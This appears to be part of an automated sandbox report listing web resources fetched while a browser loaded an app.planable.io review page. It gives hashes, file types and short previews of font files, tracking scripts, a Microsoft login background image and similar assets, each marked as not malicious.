                                                                                                                                                                              URL:https://connect.facebook.net/signals/config/758480384363072?v=2.9.179&r=stable&domain=app.planable.io&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4970
                                                                                                                                                                              Entropy (8bit):5.509135807133392
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F7C3706023049F9526B3D2D147868E7A
                                                                                                                                                                              SHA1:FC0287C7272C9878C24C4761578EA2FFA6B9B665
                                                                                                                                                                              SHA-256:157A1FD6244BFF5ECF1F83B12D5B534A2C9C8A2CF84C2B58497AA5AF061E3D1F
                                                                                                                                                                              SHA-512:BDB0EA8A70F541F0E4F92DE5390BBB4A9D3AEECB20C5067EBEA1DA2379228B989B4B5E304D6FEFCD74CBC78A42191FB3419B5C9D8DC80A662CD62703638B213D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@400;700&display=swap
                                                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufA5qW54A.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufJ5qW54A.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufB5qW54A.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 400;. font-
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                              Entropy (8bit):3.4182958340544896
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3975E60F0C61E93A6D0A9F1DEF435EAC
                                                                                                                                                                              SHA1:5C1A4A02F3681AD95FBFCEF9EE56F62B37B9AB36
                                                                                                                                                                              SHA-256:0CD6AED5D21AE37310B3C4E0FACF48009005018BF4402FBCDA1CB66D69B03346
                                                                                                                                                                              SHA-512:0672C57CB800229D4919EE3C885FDE25F3722A90FD260F29D74CBAD65353FDA134F94592E581FBFB02C7897AA23DF49C2579295C22B6AA5B1077D6D5597CAAB6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:Bad Request.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):621
                                                                                                                                                                              Entropy (8bit):7.673946009263606
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (4116), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4116
                                                                                                                                                                              Entropy (8bit):5.747034579091119
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:87EE10A3F8452AC3DA4FF10B40EDF6C2
                                                                                                                                                                              SHA1:21F3F4B8C2E1402995F8E3DCCF394851051F94F5
                                                                                                                                                                              SHA-256:4AA4BCFF63A96A3AB8C6B3E2EFBC4E87DCAD5BCA05CC126FD201817222B90834
                                                                                                                                                                              SHA-512:977371EDCF3EBDA27F5496CA6E0727835FADEFDAC23394DA736C9059E06124CCCD200AE9A2020D60CF12D1FCFC9D395DEB1D770394F772CC3EA6A8A3A95948F5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://td.doubleclick.net/td/rul/805904039?random=1736508218044&cv=11&fst=1736508218044&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5190v9118723830za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102123607~102198178&u_w=1280&u_h=1024&url=https%3A%2F%2Fapp.planable.io%2Freview%2F0OPaw36t6M_k&hn=www.googleadservices.com&frm=0&tiba=Planable&npa=0&pscdl=noapi&auid=1886413195.1736508218&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                              Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":2592000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1886413195.1736508218","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1886413195.1736508218\u0026ig_key=1sNHMxODg2NDEzMTk1LjE3MzY1MDgyMTg!2sZ6iQPA!3sAAptDV5DRnhb","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sEz03JA!2sZ6iQPA!3sAAptDV5DRnhb"],"userBiddingSignals":[["909142830","853129535"],null,1736508220418494],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=167884310089\u0026cr_id
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):16755
                                                                                                                                                                              Entropy (8bit):5.275971833003547
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:318E394CCD19CC3651A0F3ADFD1A447A
                                                                                                                                                                              SHA1:C4F6B0745412FD11E753BCFF94C5A8B8201A1B80
                                                                                                                                                                              SHA-256:FC3A0A9B74CC30A1F95D2A61B6CCB6A3D2F6F48B5C0064DDC1F772A3BE196013
                                                                                                                                                                              SHA-512:BED855FB54ED28E60EBC11BC71FDB22D11322AB7E8511E5E9E69214F1C85A8B1790B7665136146FB000BD4AD0E236A729393523BC99588CBBBEF549339D3E1DF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500&display=swap
                                                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-fam
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 16492, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):16492
                                                                                                                                                                              Entropy (8bit):7.987289867023944
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C6856AA207B4CEE5B05FF4EEFD101302
                                                                                                                                                                              SHA1:D340E6AE02636BA9B9C0EDD7BC52D2AEF37D56F2
                                                                                                                                                                              SHA-256:54DD0AC1CF6C02E094AD114D3CC038BADDC42E5D6BA1C0B74566CEDAED765C4C
                                                                                                                                                                              SHA-512:31DC9C3B69ABA9CBBCA171B3419FB530BD57C68967CA13BE5E08118C94839F4349F3D6C5931815ABF35495F0188AE5E7AFEC01490D232845356FDCFC5A25BF35
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/monoton/v20/5h1aiZUrOngCibe4TkHLQg.woff2
                                                                                                                                                                              Preview:wOF2......@l..........@.............................f...`..\........T..0..6.$..\. ..d........E.....(..i.......i{@..!..1.6 K....E.E..C...$...z..,KX..d|._....'s......q. ..%(.>.\......E".....Z...l.1...G..3...(.D..'%(H.DocG....!5..G-.7....T.........(&...n.C-...$. [H..$k`....R'v...1z...*. .Z\.A1.u).u..b...u.t./.2.....J.....-....V......T^.x..pn..d...<l_..$8.l...^...u..do...T!.u.*...|...w.>.2...\..{$........&......Pen..B.I.*......U...M.....*-......|.A....$U.H..,.nB.v.0..y.{{..........0Nv/.....I_...vG.U......?~........QfP.q...!.Y.6o.c%Q!..(.]...c..+V.k....~.....R..).u.8F...[.a@.....DD.....f..;".`>.h..Q. _.H]....@.YZt.!p...-..J...."....a..b."l.w^l<@c.h.h:.....V.]h=H........*uZh..,$.n.a7.....#.(AB.,..=+l|.t.6.x..LLS..8...G.b..1p...).Z.Z..s.j>^'6...S3.M./.DWS..@.f{..d.:..M!..V.........Q.(].....J....7..Cw.d.c?J.ud.:.......Z_ckt.Z.u...w.-}t..eZ).A.Y...\......b.m?...Yl]..I.....k....d.G....9.lD0..Dr'...p=(.....).H...3'*T.nm..\...Z.Y...l.(.(.....8G.[*
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3620
                                                                                                                                                                              Entropy (8bit):6.867828878374734
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                              SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                              SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                              SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1957)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3093
                                                                                                                                                                              Entropy (8bit):5.587742616879827
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3996B9844D981A380CFD3F1F4379C36C
                                                                                                                                                                              SHA1:9DA755B4D5819DA90A42B7C8E66199449DEB1888
                                                                                                                                                                              SHA-256:C469F9707073E2FA9E8B8AF05BB872F310B0AB538499580A4CF8BD1304893964
                                                                                                                                                                              SHA-512:C8E0F623E0C2701AA74364044A08C2EE0CFC7E3FACA9DCD9C13ED4655BB010A253E97203B668143B2A959B8E72F9528F98563182D955579E4C20E4B53EE6FAC1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://connect.facebook.net/en_US/sdk.js
                                                                                                                                                                              Preview:/*1736507203,,JIT Construction: v1019252912,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):846
                                                                                                                                                                              Entropy (8bit):5.3293248373934565
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:91A5A66C42379721FEE24CCB18789A0B
                                                                                                                                                                              SHA1:17BD16D610AE5E508ABAC570992486E241F1F42B
                                                                                                                                                                              SHA-256:4A007F84B241F4B5CD6376BD4FFD23964002EC13486AAB9B433AE5361CDA818B
                                                                                                                                                                              SHA-512:21E622983DEE5A7A0F3EC5E3AE139988BE9C9DF4444B3D7D06B178B8DF0DAD232D0FFB13AB20FD4383229835E4A61DBD923D47E4666209BF8E0F1E2693DA18FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.googleapis.com/css2?family=Poppins:wght@600&display=swap
                                                                                                                                                                              Preview:/* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (52336)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):355165
                                                                                                                                                                              Entropy (8bit):5.416378739877468
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FDCFD41A58C01664EFF9D3F39C853A3E
                                                                                                                                                                              SHA1:E2AD5A10179F46A6D744109320DE65F54D09D13A
                                                                                                                                                                              SHA-256:E2B54E6FE2E3A5677C1B7C775EA969DA9CCB7292CE539688D61A60A5C744A290
                                                                                                                                                                              SHA-512:C91D9A8A862378F3FEA9EBC71F159E39C824A98427DB18604FE48F0FFC72642878DDE98393B277CFF6A88BE4130E059C5B16007F2A11A88935E7B236D75DCEBE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://analytics.tiktok.com/i18n/pixel/static/main.MWZhMDU3MTU4MA.js
                                                                                                                                                                              Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16345
                                                                                                                                                                              Entropy (8bit):7.98960525258912
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                                                                                                              SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                                                                                                              SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                                                                                                              SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):673
                                                                                                                                                                              Entropy (8bit):7.6596900876595075
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2672
                                                                                                                                                                              Entropy (8bit):6.640973516071413
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                              SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                              SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                              SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
